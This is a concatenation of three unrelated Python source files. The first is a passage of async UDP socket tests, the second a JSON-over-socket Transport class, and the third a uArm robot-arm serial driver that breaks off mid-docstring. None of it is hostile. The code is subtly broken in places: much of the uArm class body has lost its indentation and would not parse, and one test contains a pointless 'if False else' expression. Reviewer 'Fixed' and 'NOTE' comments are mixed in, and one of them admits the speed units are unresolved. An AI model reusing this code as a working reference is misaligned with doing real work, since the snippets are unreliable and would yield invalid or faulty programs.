        """Datagrams sent to the socket's own address are received back."""
        async with await create_udp_socket(
            local_host="localhost", family=family
        ) as sock:
            host, port = sock.extra(SocketAttribute.local_address)  # type: ignore[misc]
            await sock.sendto(b"blah", host, port)
            request, addr = await sock.receive()
            assert request == b"blah"
            assert addr == sock.extra(SocketAttribute.local_address)

            await sock.sendto(b"halb", host, port)
            response, addr = await sock.receive()
            assert response == b"halb"
            assert addr == (host, port)

    async def test_iterate(self, family: AnyIPAddressFamily) -> None:
        """Async iteration yields (payload, sender) pairs; echo server test."""
        async def serve() -> None:
            async for packet, addr in server:
                await server.send((packet[::-1], addr))

        async with await create_udp_socket(
            family=family, local_host="localhost"
        ) as server:
            host, port = server.extra(SocketAttribute.local_address)  # type: ignore[misc]
            async with await create_udp_socket(
                family=family, local_host="localhost"
            ) as client:
                async with create_task_group() as tg:
                    tg.start_soon(serve)
                    await client.sendto(b"FOOBAR", host, port)
                    assert await client.receive() == (b"RABOOF", (host, port))
                    await client.sendto(b"123456", host, port)
                    assert await client.receive() == (b"654321", (host, port))
                    tg.cancel_scope.cancel()

    @pytest.mark.skipif(
        not hasattr(socket, "SO_REUSEPORT"), reason="SO_REUSEPORT option not supported"
    )
    async def test_reuse_port(self, family: AnyIPAddressFamily) -> None:
        """Two sockets can share one port when reuse_port is requested."""
        async with await create_udp_socket(
            family=family, local_host="localhost", reuse_port=True
        ) as udp:
            port = udp.extra(SocketAttribute.local_port)
            assert port != 0
            async with await create_udp_socket(
                family=family, local_host="localhost", local_port=port, reuse_port=True
            ) as udp2:
                assert port == udp2.extra(SocketAttribute.local_port)

    async def test_concurrent_receive(self) -> None:
        """A second concurrent receive() raises BusyResourceError."""
        async with await create_udp_socket(
            family=AddressFamily.AF_INET, local_host="localhost"
        ) as udp:
            async with create_task_group() as tg:
                tg.start_soon(udp.receive)
                await wait_all_tasks_blocked()
                try:
                    with pytest.raises(BusyResourceError) as exc:
                        await udp.receive()

                    exc.match("already reading from")
                finally:
                    tg.cancel_scope.cancel()

    async def test_close_during_receive(self) -> None:
        """Closing the socket while receive() is blocked raises ClosedResourceError."""
        async def close_when_blocked() -> None:
            await wait_all_tasks_blocked()
            await udp.aclose()

        async with await create_udp_socket(
            family=AddressFamily.AF_INET, local_host="localhost"
        ) as udp:
            async with create_task_group() as tg:
                tg.start_soon(close_when_blocked)
                with pytest.raises(ClosedResourceError):
                    await udp.receive()

    async def test_receive_after_close(self) -> None:
        """receive() on a closed socket raises ClosedResourceError."""
        udp = await create_udp_socket(
            family=AddressFamily.AF_INET, local_host="localhost"
        )
        await udp.aclose()
        with pytest.raises(ClosedResourceError):
            await udp.receive()

    async def test_send_after_close(self) -> None:
        """sendto() on a closed socket raises ClosedResourceError."""
        udp = await create_udp_socket(
            family=AddressFamily.AF_INET, local_host="localhost"
        )
        host, port = udp.extra(SocketAttribute.local_address)  # type: ignore[misc]
        await udp.aclose()
        with pytest.raises(ClosedResourceError):
            await udp.sendto(b"foo", host, port)

    async def test_create_unbound_socket(self, family: AnyIPAddressFamily) -> None:
        """Regression test for #360."""
        async with await create_udp_socket(family=family) as udp:
            local_address = cast(
                IPSockAddrType, udp.extra(SocketAttribute.local_address)
            )
            assert local_address[1] > 0
@pytest.mark.usefixtures("check_asyncio_bug")
class TestConnectedUDPSocket:
    """Tests for connected (send/receive-style) UDP sockets."""

    async def test_extra_attributes(self, family: AnyIPAddressFamily) -> None:
        """A connected UDP socket exposes both local and remote attributes."""
        async with await create_connected_udp_socket(
            "localhost", 5000, family=family
        ) as udp:
            raw_socket = udp.extra(SocketAttribute.raw_socket)
            assert udp.extra(SocketAttribute.family) == family
            assert (
                udp.extra(SocketAttribute.local_address) == raw_socket.getsockname()[:2]
            )
            assert udp.extra(SocketAttribute.local_port) == raw_socket.getsockname()[1]
            assert (
                udp.extra(SocketAttribute.remote_address)
                == raw_socket.getpeername()[:2]
            )
            assert udp.extra(SocketAttribute.remote_port) == 5000

    async def test_send_receive(self, family: AnyIPAddressFamily) -> None:
        """Round-trip datagrams between an unconnected and a connected socket."""
        async with await create_udp_socket(
            family=family, local_host="localhost"
        ) as udp1:
            host, port = udp1.extra(SocketAttribute.local_address)  # type: ignore[misc]
            async with await create_connected_udp_socket(
                host, port, local_host="localhost", family=family
            ) as udp2:
                host, port = udp2.extra(SocketAttribute.local_address)  # type: ignore[misc]
                await udp2.send(b"blah")
                request = udp1.receive() if False else await udp1.receive()
                assert request == (b"blah", (host, port))

                await udp1.sendto(b"halb", host, port)
                response = await udp2.receive()
                assert response == b"halb"

    async def test_iterate(self, family: AnyIPAddressFamily) -> None:
        """Async iteration over a connected socket yields bare payloads."""
        async def serve() -> None:
            async for packet in udp2:
                await udp2.send(packet[::-1])

        async with await create_udp_socket(
            family=family, local_host="localhost"
        ) as udp1:
            host, port = udp1.extra(SocketAttribute.local_address)  # type: ignore[misc]
            async with await create_connected_udp_socket(host, port) as udp2:
                host, port = udp2.extra(SocketAttribute.local_address)  # type: ignore[misc]
                async with create_task_group() as tg:
                    tg.start_soon(serve)
                    await udp1.sendto(b"FOOBAR", host, port)
                    assert await udp1.receive() == (b"RABOOF", (host, port))
                    await udp1.sendto(b"123456", host, port)
                    assert await udp1.receive() == (b"654321", (host, port))
                    tg.cancel_scope.cancel()

    @pytest.mark.skipif(
        not hasattr(socket, "SO_REUSEPORT"), reason="SO_REUSEPORT option not supported"
    )
    async def test_reuse_port(self, family: AnyIPAddressFamily) -> None:
        """Two connected sockets can share one local port with reuse_port."""
        async with await create_connected_udp_socket(
            "localhost", 6000, family=family, local_host="localhost", reuse_port=True
        ) as udp:
            port = udp.extra(SocketAttribute.local_port)
            assert port != 0
            async with await create_connected_udp_socket(
                "localhost",
                6001,
                family=family,
                local_host="localhost",
                local_port=port,
                reuse_port=True,
            ) as udp2:
                assert port == udp2.extra(SocketAttribute.local_port)

    async def test_concurrent_receive(self) -> None:
        """A second concurrent receive() raises BusyResourceError."""
        async with await create_connected_udp_socket(
            "localhost", 5000, local_host="localhost", family=AddressFamily.AF_INET
        ) as udp:
            async with create_task_group() as tg:
                tg.start_soon(udp.receive)
                await wait_all_tasks_blocked()
                try:
                    with pytest.raises(BusyResourceError) as exc:
                        await udp.receive()

                    exc.match("already reading from")
                finally:
                    tg.cancel_scope.cancel()

    async def test_close_during_receive(self) -> None:
        """Closing while receive() is blocked raises ClosedResourceError."""
        async def close_when_blocked() -> None:
            await wait_all_tasks_blocked()
            await udp.aclose()

        async with await create_connected_udp_socket(
            "localhost", 5000, local_host="localhost", family=AddressFamily.AF_INET
        ) as udp:
            async with create_task_group() as tg:
                tg.start_soon(close_when_blocked)
                with pytest.raises(ClosedResourceError):
                    await udp.receive()

    async def test_receive_after_close(self, family: AnyIPAddressFamily) -> None:
        """receive() on a closed socket raises ClosedResourceError."""
        udp = await create_connected_udp_socket(
            "localhost", 5000, local_host="localhost", family=family
        )
        await udp.aclose()
        with pytest.raises(ClosedResourceError):
            await udp.receive()

    async def test_send_after_close(self, family: AnyIPAddressFamily) -> None:
        """send() on a closed socket raises ClosedResourceError."""
        udp = await create_connected_udp_socket(
            "localhost", 5000, local_host="localhost", family=family
        )
        await udp.aclose()
        with pytest.raises(ClosedResourceError):
            await udp.send(b"foo")
@pytest.mark.network
async def test_getaddrinfo() -> None:
    """getaddrinfo() must use IDNA 2008 (faß.de != fass.de)."""
    # IDNA 2003 gets this wrong
    correct = await getaddrinfo("faß.de", 0)
    wrong = await getaddrinfo("fass.de", 0)
    assert correct != wrong
@pytest.mark.parametrize(
    "sock_type", [socket.SOCK_STREAM, socket.SocketKind.SOCK_STREAM]
)
async def test_getaddrinfo_ipv6addr(
    sock_type: Literal[socket.SocketKind.SOCK_STREAM],
) -> None:
    """Raw IPv6 literals must bypass IDNA encoding in getaddrinfo()."""
    # IDNA trips up over raw IPv6 addresses
    # NOTE(review): Windows reports proto 0 here while other platforms report
    # IPPROTO_TCP (6) — confirmed by the platform check below.
    proto = 0 if platform.system() == "Windows" else 6
    assert await getaddrinfo("::1", 0, type=sock_type) == [
        (
            socket.AddressFamily.AF_INET6,
            socket.SocketKind.SOCK_STREAM,
            proto,
            "",
            ("::1", 0),
        )
    ]
async def test_getnameinfo() -> None:
    """The async getnameinfo() matches the stdlib blocking result."""
    expected_result = socket.getnameinfo(("127.0.0.1", 6666), 0)
    result = await getnameinfo(("127.0.0.1", 6666))
    assert result == expected_result
|
transport.py | import socket
from threading import Thread, Lock
from json import dumps as dictToJson
from json import loads as jsonToDict
from json.decoder import JSONDecodeError
from .common import encodeImg, decodeImg, generateSocket
#################
### CONSTANTS ###
#################
from .constants import ACK, NEWLINE, IMG_MSG_S, IMG_MSG_E
from .constants import IMAGE, TYPE, DATA
from .constants import PORT, TIMEOUT, SIZE
from .constants import STATUS, CLOSING, NAME_CONN
from .constants import MAX_RETRIES
###############################################################
#######################
### TRANSPORT CLASS ###
#######################
class Transport:
    """Bidirectional, newline-delimited JSON message channel over a socket.

    Each message is a JSON object ``{TYPE: channel, DATA: payload}``; the most
    recent payload per channel is cached in ``self.channels``. Exactly one of
    ``connect()`` (client/local side) or ``receive()`` (server/remote side)
    must be called before the transport is usable. A daemonless background
    thread reads incoming data until ``close()`` is called or the peer closes.
    """

    TYPE_LOCAL = 1   # this endpoint initiated the connection
    TYPE_REMOTE = 2  # this endpoint accepted the connection

    def __init__(self, name, timeout=TIMEOUT, size=SIZE):
        """
        :param name: human-readable connection name (may be overwritten by
                     a NAME_CONN control message from the peer)
        :param timeout: socket timeout in seconds for blocking operations
        :param size: recv() buffer size in bytes
        """
        self.name = name
        self.socket = None
        self.addr, self.port = None, None
        self.canWrite = True   # image flow control: wait for ACK between frames
        self.channels = {}     # channel name -> last received payload
        self.timeout = timeout
        self.size = size
        self.stopped = False   # reader thread exits when True
        self.opened = False    # True while the connection is usable
        self.type = None       # TYPE_LOCAL or TYPE_REMOTE
        self.lock = Lock()     # guards channels and socket writes

    def receive(self, socket, addr, port):
        """Adopt an already-accepted socket (server side) and start reading.

        NOTE: the ``socket`` parameter intentionally keeps its historical name
        even though it shadows the ``socket`` module inside this method.
        """
        self.socket = socket
        self.addr = addr
        self.port = port
        self.socket.settimeout(self.timeout)
        self.type = Transport.TYPE_REMOTE
        self.opened = True
        self.__start()

    def __start(self):
        """Spawn the background reader thread; a socket must exist first."""
        if self.socket is None:
            # Fixed: the original had an unreachable `return` after this raise.
            raise RuntimeError("Connection started without socket")
        Thread(target=self.__run, args=()).start()
        return self

    def __run(self):
        """Reader loop: accumulate bytes, split on newlines, decode JSON."""
        tmp = ""
        while True:
            if self.stopped:
                self.socket.close()
                return
            try:
                tmp += self.socket.recv(self.size).decode()
            except socket.timeout:
                continue
            except OSError:
                # Peer vanished: request an orderly shutdown. We still fall
                # through once to flush any fully-buffered messages; the next
                # iteration observes `stopped` and closes the socket.
                self.close()
            if tmp != "":
                data = tmp.split("\n")
                for i in range(len(data)):
                    try:
                        msg = jsonToDict(data[i])
                    except JSONDecodeError:
                        # Incomplete fragment - keep it for the next recv().
                        continue
                    self.__cascade(msg[TYPE], msg[DATA])
                    if msg[TYPE] == IMAGE:
                        self.channels[IMAGE] = decodeImg(msg[DATA])
                    else:
                        self.channels[msg[TYPE]] = msg[DATA]
                    data[i] = ""
                tmp = "".join(data)

    def __cascade(self, mtype, mdata):
        """Handle control messages: ACK, close notice, rename, image receipt."""
        if mtype == ACK:
            self.canWrite = True
        if mtype == STATUS:
            if mdata == CLOSING:
                self.__close()
        if mtype == NAME_CONN:
            self.name = mdata
        if mtype == IMAGE:
            # Acknowledge each frame so the sender may transmit the next one.
            self.write(ACK, ACK)

    def __close(self):
        """Mark the transport closed; the reader thread closes the socket."""
        self.opened = False
        self.stopped = True

    #################
    ### INTERFACE ###
    #################
    def connect(self, name, addr, port):
        """Open a client connection, retrying until the peer is reachable.

        :raises RuntimeError: for OSErrors other than refused connections
                              (e.g. the local address is already in use)
        """
        self.name = name
        self.addr = addr
        self.port = port
        while True:
            try:
                self.socket = generateSocket(self.timeout)
                self.socket.connect((self.addr, self.port))
                break
            except socket.timeout:
                continue
            except socket.gaierror:
                continue
            except OSError as e:
                if type(e) == ConnectionRefusedError:
                    continue
                # Fixed: the original had an unreachable `return` after this raise.
                raise RuntimeError("Socket address in use: {}".format(e))
        self.type = Transport.TYPE_LOCAL
        self.opened = True
        self.write(NAME_CONN, self.name)
        self.__start()

    def get(self, channel):
        """Return the last payload received on `channel`, or None."""
        with self.lock:
            if channel in self.channels:
                return self.channels[channel]
            return None

    def getImg(self):
        """Return the last decoded image, or None.

        Fixed: now acquires the lock like get() so reads are consistent with
        concurrent reader-thread updates.
        """
        with self.lock:
            if IMAGE in self.channels:
                return self.channels[IMAGE]
            return None

    def write(self, channel, data):
        """Send one JSON message; embedded newlines are stripped because the
        newline is the message delimiter."""
        if self.opened:
            with self.lock:
                msg = {TYPE: channel.replace("\n", ""), DATA: data.replace("\n", "")}
                self.socket.sendall(dictToJson(msg).encode() + NEWLINE)

    def writeImg(self, data):
        """Send one encoded image frame; blocked until the prior frame is ACKed."""
        if self.canWrite and self.opened:
            with self.lock:
                self.canWrite = False
                self.socket.sendall(IMG_MSG_S + encodeImg(data) + IMG_MSG_E + NEWLINE)

    def close(self):
        """Notify the peer we are closing (best effort) and stop the reader."""
        try:
            self.write(STATUS, CLOSING)
        except OSError:
            pass
        self.__close()
|
uarm.py | from __future__ import print_function
import serial
from . import protocol
from .log import DEBUG, INFO, ERROR, printf, init_logger, set_default_logger, close_logger
from . import PY3
import time
import threading
from .tools.list_uarms import uarm_ports, get_port_property
if PY3:
from queue import Queue, LifoQueue, Empty
else:
from Queue import Queue, LifoQueue, Empty
# ################################### Exception ################################
def catch_exception(func):
    """Decorator: log any exception raised by *func* at ERROR level instead of
    propagating it; the wrapped call then returns None.

    Fixed: the wrapper now carries the wrapped function's metadata
    (``__name__``, ``__doc__``) via functools.wraps, so logs and
    introspection report the real function instead of ``decorator``.
    """
    from functools import wraps

    @wraps(func)
    def decorator(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except Exception as e:
            printf("{} - {} - {}".format(type(e).__name__, func.__name__, e), ERROR)

    return decorator
class UArmConnectException(Exception):
    """Exception describing a uArm connection failure.

    errno meanings: 0 unable to connect, 1 unknown firmware version,
    2 unsupported firmware version, 3 no available port, 4 not connected.
    """

    # errno -> human-readable description; unknown codes fall back below.
    _ERROR_TEXT = {
        0: "Unable to connect uArm",
        1: "Unknown Firmware Version",
        2: "Unsupported uArm Firmware Version",
        3: "No available uArm Port",
        4: "uArm is not connected",
    }

    def __init__(self, errno, message=None):
        """
        uArm Connect Exception
        :param errno: 0 Unable to connect uArm, 1 unknown firmware version, 2 unsupported uArm Firmware version
        :param message:
        """
        self.message = "" if message is None else message
        self.errno = errno
        self.error = self._ERROR_TEXT.get(errno, "Not Defined Error")

    def __str__(self):
        return repr(self.error + "-" + self.message)
class UArm(object):
def __init__(self, port_name=None, timeout=2, debug=False, logger=None):
    """
    :param port_name: UArm Serial Port name, if no port provide, will try first port we detect
    :param logger: if no logger provide, will create a logger by default
    :param debug: if Debug is True, create a Debug Logger by default
    :param timeout: default timeout is 2 sec.
    :raise UArmConnectException
    | if no port provide, we will detect all connected uArm serial devices.
    | please reference `pyuarm.tools.list_uarms`
    | port is a device name: depending on operating system.
    | eg. `/dev/ttyUSB0` on GNU/Linux or `COM3` on Windows.
    | logger will display all info/debug/error/warning messages.
    """
    # Reset every attribute to its disconnected default first.
    self.__init_property()
    self.timeout = timeout
    if port_name is not None:
        self.port_name = port_name
    # Route log output either through the caller's logger or a default one.
    if logger is None:
        set_default_logger(debug)
    else:
        init_logger(logger)
def __init_property(self):
    """Reset all connection-related attributes to their disconnected state.

    Called from __init__ and again from close() so a UArm instance can be
    reconnected after being released.
    """
    self.timeout = None
    self.port_name = None
    self.__data_buf = None            # lines buffered by the reader thread (PY3)
    self.__position_queue = None      # LIFO of unsolicited position reports
    self.__menu_button_queue = None
    self.__play_button_queue = None
    self.__send_queue = None          # outgoing messages for the send thread
    self.__firmware_version = None
    self.__hardware_version = None
    self.__isReady = None             # set once the firmware READY banner arrives
    self.__receive_thread = None
    self.__send_thread = None
    self.serial_id = None             # rolling message id (1..65535)
    self.msg_buff = None              # msg_id -> response tokens
    self.__serial = None
    self.__reader_thread = None       # pyserial ReaderThread (PY3 only)
    self.__transport = None
    self.__protocol = None
    self.port = None
    self.__connect_flag = False       # PY2-only manual connection flag
def __init_serial_core(self):
    """Start the serial reader machinery.

    Under Python 3 this launches a pyserial ``ReaderThread`` whose
    ``connect()`` waits for the transport to come up; under Python 2 we only
    raise the manual connect flag and read the port directly elsewhere.
    """
    if PY3:
        from .threaded import UArmSerial, UArmReaderThread
        self.__reader_thread = UArmReaderThread(self.__serial, UArmSerial, self.__data_buf)
        self.__reader_thread.start()
        # Fixed: connect() was called twice and the first result discarded;
        # a single call both waits for the connection and returns the pair.
        self.__transport, self.__protocol = self.__reader_thread.connect()
    else:
        self.__connect_flag = True
def __close_serial_core(self):
    """Stop the serial reader machinery (mirror of __init_serial_core)."""
    if PY3:
        # Stops the pyserial ReaderThread and closes its transport.
        self.__reader_thread.stop()
    else:
        self.__connect_flag = False
@catch_exception
def connect(self):
    """
    This function will open the port immediately. Function will wait for the READY Message for 5 secs.
    | Once received READY message, will finish connection.
    """
    # Auto-detect a port when none was provided at construction time.
    if self.port_name is None:
        ports = uarm_ports()
        if len(ports) > 0:
            self.port_name = ports[0]
        else:
            raise UArmConnectException(3)
    # (Re)initialise all per-connection state.
    self.__data_buf = []
    self.__position_queue = LifoQueue()
    self.__menu_button_queue = LifoQueue()
    self.__play_button_queue = LifoQueue()
    self.__send_queue = Queue()
    self.__firmware_version = None
    self.__hardware_version = None
    self.__isReady = False
    self.port = get_port_property(self.port_name)
    self.__receive_thread = threading.Thread(target=self.__receive_thread_process)
    self.__send_thread = threading.Thread(target=self.__send_thread_process)
    # Daemon threads so a wedged serial link cannot keep the process alive.
    self.__receive_thread.setDaemon(True)
    self.__send_thread.setDaemon(True)
    self.serial_id = 1
    self.msg_buff = {}  # msg_id -> response tokens
    self.__serial = serial.Serial(baudrate=115200, timeout=0.1)
    try:
        self.__serial.port = self.port.device
        printf("Connecting from port - {0}...".format(self.port.device))
        self.__serial.open()
        self.__init_serial_core()
        self.__connect()
    except serial.SerialException as e:
        raise UArmConnectException(0, "port: {}, Error: {}".format(self.port.device, e.strerror))
def __connect(self):
    """Wait (up to 5s) for the link, start worker threads, then wait
    (up to self.timeout) for the firmware READY banner.

    NOTE(review): both waits are busy loops with no sleep - they spin a CPU
    core while waiting; consider adding a short time.sleep().
    """
    start_time = time.time()
    while time.time() - start_time < 5:
        if self.connection_state:
            break
    self.__receive_thread.start()
    self.__send_thread.start()
    start_time = time.time()
    while time.time() - start_time < self.timeout:
        # __isReady is flipped by the receive thread in __process_line().
        if self.__isReady:
            break
@property
def connection_state(self):
    """
    Return the uArm Connection status.
    :return: boolean
    """
    if PY3:
        # The pyserial threaded protocol object tracks the link state.
        return False if self.__protocol is None else self.__protocol.get_connect_status()
    # Python 2: we track the state ourselves next to the open port.
    return self.__serial is not None and self.__serial.is_open and self.__connect_flag
@catch_exception
def disconnect(self):
    """
    Disconnect the serial connection, terminate all queue and thread
    """
    # Stop the reader machinery first, then release the port itself.
    self.__close_serial_core()
    self.__serial.close()
    printf("Disconnect from {}".format(self.port_name))
@catch_exception
def close(self):
    """
    Release all resources:
    | - logger
    | - queue
    | - thread
    """
    if self.connection_state:
        self.disconnect()
    close_logger()
    # Reset everything so the instance can be connect()-ed again.
    self.__init_property()
def __process_line(self, line):
    """Parse one line from the firmware and route it to the right buffer."""
    if line is not None:
        if line.startswith("$"):
            # "$<id> <tokens...>" is the reply to a message we sent.
            values = line.split(' ')
            msg_id = int(values[0].replace('$', ''))
            self.msg_buff[msg_id] = values[1:]
            printf("MSG Received: {}".format(line), DEBUG)
        elif line.startswith(protocol.READY):
            # Firmware boot banner - unblocks __connect().
            printf("Received MSG: {}".format(line), DEBUG)
            self.__isReady = True
        elif line.startswith(protocol.REPORT_POSITION_PREFIX):
            # Unsolicited position report; tokens are "Xnn Ynn Znn" style.
            printf("POSITION REPORT: {}".format(line), DEBUG)
            values = line.split(' ')
            pos_array = [float(values[1][1:]), float(values[2][1:]),
                         float(values[3][1:])]
            self.__position_queue.put(pos_array, block=False)
def __receive_thread_process(self):
    """
    This Function is for receiving thread. Under Python3.x we will use `pyserial threading`_ to manage
    the send/receive logic.
    | This thread will be finished if serial connection is end.
    .. _pyserial threading: http://pyserial.readthedocs.io/en/latest/pyserial_api.html#module-serial.threaded
    """
    while self.connection_state:
        try:
            line = None
            if PY3:
                # The ReaderThread appends decoded lines to __data_buf.
                if len(self.__data_buf) > 0:
                    line = self.__data_buf.pop().rstrip('\r\n')
            else:
                # NOTE(review): on Python 2 readline() returns a str, so
                # rstrip('\r\n') works; this branch must not run under PY3.
                line = self.__serial.readline().rstrip('\r\n')
            if not line:
                continue
            self.__process_line(line)
        except serial.SerialException as e:
            printf("Receive Process Fatal - {}".format(e), ERROR)
            if not PY3:
                self.__connect_flag = False
        except Exception as e:
            printf("Receive Process {} - {}".format(type(e).__name__, e), ERROR)
        # Brief pause so this polling loop does not peg a CPU core.
        time.sleep(0.001)
    # Make Sure all queues were release
    # NOTE(review): Queue.join() blocks until every put() has a matching
    # task_done(); position reports are never task_done()-ed - confirm this
    # cannot hang the thread on shutdown.
    self.__position_queue.join()
    self.__play_button_queue.join()
    self.__menu_button_queue.join()
def __send_thread_process(self):
    """
    This function is for sending thread function.
    | All functions which start with ``get_`` and with ``wait=True`` function will send out with this thread.
    | thread will be finished if serial connection is end.
    """
    while self.connection_state:
        try:
            item = self.__send_queue.get()
            if item is None:
                # None is the sentinel used to wake/terminate this thread.
                break
            msg_id = item['id']
            msg_content = item['msg']
            msg = '#{} {}'.format(msg_id, msg_content)
            if PY3:
                self.__protocol.write_line(msg)
            else:
                # Python 2: write the raw str plus terminating newline.
                self.__serial.write(msg)
                self.__serial.write('\n')
            printf("Send {}".format(msg), DEBUG)
            # Busy-wait until the reply for this id lands in msg_buff,
            # or the per-message timeout expires.
            start_time = time.time()
            while time.time() - start_time < self.timeout:
                if msg_id in self.msg_buff.keys():
                    break
            self.__send_queue.task_done()
        except Exception as e:
            printf("Error: {}".format(e), ERROR)
        time.sleep(0.001)
    # Make Sure all queues were release
    self.__send_queue.join()
def __gen_serial_id(self):
    """
    Generate a serial id to identify the message.
    :return: Integer serial id (1..65535, wrapping back to 1)
    """
    # Wrap around once the 16-bit ceiling is reached; ids restart at 1.
    self.serial_id = 1 if self.serial_id == 65535 else self.serial_id + 1
    return self.serial_id
def send_and_receive(self, msg):
    """
    This function will block until receive the response message.
    :param msg: String Serial Command
    :return: (Integer msg_id, String response) and (None, None) if no response
    :raise UArmConnectException: errno 4 when not connected
    """
    if self.connection_state:
        msg_id = self.__gen_serial_id()
        item = {'id': msg_id, 'msg': msg}
        self.__send_queue.put(item)
        # Busy-wait for the reply to appear in msg_buff (filled by the
        # receive thread) until the timeout expires.
        start_time = time.time()
        while time.time() - start_time < self.timeout:
            if msg_id in self.msg_buff.keys():
                return msg_id, self.msg_buff[msg_id]
        # print("duration: {}".format(time.time() - start_time))
        return None, None
    else:
        raise UArmConnectException(4)
def send_msg(self, msg):
    """
    This function will send out the message and return the serial_id immediately.
    :param msg: String, Serial Command
    :return: Integer serial id assigned to the outgoing message
    :raise UArmConnectException: errno 4 when not connected
    """
    if self.connection_state:
        serial_id = self.__gen_serial_id()
        _msg = '#{} {}'.format(serial_id, msg)
        if PY3:
            self.__protocol.write_line(_msg)
        else:
            # Python 2: write the raw str plus terminating newline.
            self.__serial.write(_msg)
            self.__serial.write('\n')
        printf("Send #{} {}".format(serial_id, msg), DEBUG)
        return serial_id
    else:
        raise UArmConnectException(4)
# -------------------------------------------------------- Commands ---------------------------------------------------#
def reset(self):
    """
    Reset include below action:
    - Attach all servos
    - Move to default position (0, 150, 150) with speed 100mm/min
    - Turn off Pump/Gripper
    - Set Wrist Servo to Angle 90
    :return:
    """
    self.set_servo_attach()
    # Give the servos a moment to engage before commanding a move.
    time.sleep(0.1)
    self.set_position(0, 150, 150, speed=100, wait=True)
    self.set_pump(False)
    self.set_gripper(False)
    self.set_wrist(90)
# -------------------------------------------------------- Get Commands -----------------------------------------------#
@property
@catch_exception
def firmware_version(self):
    """
    Get the firmware version (cached after the first successful query).
    Protocol Cmd: ``protocol.GET_FIRMWARE_VERSION``
    :return: firmware version string, if failed return None
    """
    if self.__firmware_version is not None:
        return self.__firmware_version
    else:
        try:
            cmd = protocol.GET_FIRMWARE_VERSION
            serial_id, response = self.send_and_receive(cmd)
            if response is not None:
                if response[0] == protocol.OK:
                    # Response token looks like "V1.2.3"; strip the prefix.
                    self.__firmware_version = response[1].replace('V', '')
                    return self.__firmware_version
            return None
        except Exception as e:
            printf("Error: {}".format(e), ERROR)
@property
@catch_exception
def hardware_version(self):
    """
    Get the Product version (cached after the first successful query).
    Protocol Cmd: ``protocol.GET_HARDWARE_VERSION``
    :return: hardware version string, if failed return None
    """
    if self.__hardware_version is not None:
        return self.__hardware_version
    else:
        try:
            cmd = protocol.GET_HARDWARE_VERSION
            serial_id, response = self.send_and_receive(cmd)
            if response is not None:
                if response[0] == protocol.OK:
                    # Response token looks like "V2.1"; strip the prefix.
                    self.__hardware_version = response[1].replace('V', '')
                    return self.__hardware_version
            return None
        except Exception as e:
            printf("Error: {}".format(e), ERROR)
@catch_exception
def get_position(self):
"""
Get Current uArm position (x,y,z)
:return: Float Array. Returns an array of the format [x, y, z] of the robots current location
"""
serial_id, response = self.send_and_receive(protocol.GET_COOR)
if response is None:
printf("No Message response {}".format(serial_id), ERROR)
return None
if response[0] == protocol.OK:
x = float(response[1][1:])
y = float(response[2][1:])
z = float(response[3][1:])
coordinate = [x, y, z]
return coordinate
return None
@catch_exception
def get_is_moving(self):
"""
Get the uArm current moving status.
:return: Boolean True or False
"""
serial_id, response = self.send_and_receive(protocol.GET_IS_MOVE)
if response is None:
printf("No Message response {}".format(serial_id), ERROR)
return None
if response[0] == protocol.OK:
v = int(response[1][1:])
if v == 0:
return False
elif v == 1:
return True
@catch_exception
def get_polar(self):
"""
get Polar coordinate
:return: Float Array. Return an array of the format [rotation, stretch, height]
"""
serial_id, response = self.send_and_receive(protocol.GET_POLAR)
if response is None:
printf("No Message response {}".format(serial_id))
return
if response[0] == protocol.OK:
stretch = float(response[1][1:])
rotation = float(response[2][1:])
height = float(response[3][1:])
polar = [rotation, stretch, height]
return polar
else:
return None
@catch_exception
def get_tip_sensor(self):
"""
Get Status from Tip Sensor
:return: True On/ False Off
"""
serial_id, response = self.send_and_receive(protocol.GET_TIP_SENSOR)
if response is None:
printf("No Message response {}".format(serial_id))
return
if response[0] == protocol.OK:
if response[1] == 'V0':
return True
elif response[1] == 'V1':
return False
else:
return None
@catch_exception
def get_servo_angle(self, servo_num=None):
"""
Get Servo Angle
:param servo_num: if servo_num not provide, will return a array. for all servos, servo 0
, servo 1, servo 2, servo 3
:return:
"""
serial_id, response = self.send_and_receive(protocol.GET_SERVO_ANGLE)
if response is None:
printf("No Message response {}".format(serial_id))
return None
if response[0] == protocol.OK:
servo_0 = float(response[1][1:])
servo_1 = float(response[2][1:])
servo_2 = float(response[3][1:])
servo_3 = float(response[4][1:])
servo_array = [servo_0, servo_1, servo_2, servo_3]
if servo_num is None:
return servo_array
elif servo_num == 0:
return servo_0
elif servo_num == 1:
return servo_1
elif servo_num == 2:
return servo_2
elif servo_num == 3:
return servo_3
else:
return None
@catch_exception
def get_analog(self, pin):
"""
Get Analog Value from specific PIN
:param pin:
:return:
"""
try:
cmd = protocol.GET_ANALOG.format(pin)
serial_id, response = self.send_and_receive(cmd)
if response is None:
printf("No Message response {}".format(serial_id))
return
if response[0] == protocol.OK:
val = "".join(response[1:])[1:]
return int(float(val))
else:
return None
except Exception as e:
printf("Error {}".format(e))
return None
@catch_exception
def get_digital(self, pin):
"""
Get Digital Value from specific PIN.
:param pin:
:return:
"""
try:
cmd = protocol.GET_DIGITAL.format(pin)
serial_id, response = self.send_and_receive(cmd)
if response is None:
printf("No Message response {}".format(serial_id))
return
if response[0] == protocol.OK:
if response[1] == 'V0':
return True
elif response[1] == 'V1':
return False
else:
return None
except Exception as e:
printf("Error {}".format(e))
return None
@catch_exception
def get_rom_data(self, address, data_type=protocol.EEPROM_DATA_TYPE_BYTE):
"""
Get DATA From EEPROM
:param address: 0 - 2048
:param data_type: EEPROM_DATA_TYPE_FLOAT, EEPROM_DATA_TYPE_INTEGER, EEPROM_DATA_TYPE_BYTE
:return:
"""
try:
cmd = protocol.GET_EEPROM.format(address, data_type)
serial_id, response = self.send_and_receive(cmd)
if response is None:
printf("No Message response {}".format(serial_id))
return
if response[0] == protocol.OK:
if data_type == protocol.EEPROM_DATA_TYPE_FLOAT:
return float(response[1][1:])
elif data_type == protocol.EEPROM_DATA_TYPE_INTEGER:
return int(response[1][1:])
elif data_type == protocol.EEPROM_DATA_TYPE_BYTE:
return int(response[1][1:])
except Exception as e:
printf("Error {}".format(e))
return None
# -------------------------------------------------------- Set Commands -----------------------------------------------#
    @catch_exception
    def set_position(self, x=None, y=None, z=None, speed=300, relative=False, wait=False):
        """
        Move uArm to the position (x,y,z). Position unit is mm.
        :param x: target X in mm; None allowed only when relative=True (treated as 0)
        :param y: target Y in mm; None allowed only when relative=True (treated as 0)
        :param z: target Z in mm; None allowed only when relative=True (treated as 0)
        :param speed: movement speed (docstring said mm/sec, reset() says mm/min -- TODO confirm units against firmware)
        :param relative: if True, (x, y, z) are offsets from the current position
